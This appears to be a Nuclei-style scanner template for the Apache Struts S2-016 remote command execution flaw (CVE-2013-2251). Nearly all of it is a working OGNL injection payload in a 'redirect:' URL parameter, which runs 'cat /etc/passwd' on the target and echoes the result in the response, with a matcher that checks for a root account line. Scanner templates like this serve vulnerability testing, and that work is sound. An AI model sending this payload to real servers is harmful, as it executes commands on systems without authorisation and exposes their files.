id: apache-Struts-S2-016-rce.yaml

info:
  name: Remote Command Execution ( Apache Struts S2-016) 
  author: j4v40n654n
  severity: high
  reference: |
    - CVE-2013-2251
    - https://twitter.com/Alra3ees/status/1416185619336814596
  tags: apache, rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/sm/login/loginpagecontentgrabber.do?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}"

    matchers:
      - type: regex
        words:
          - "root:.*:0:0:"
        part: body
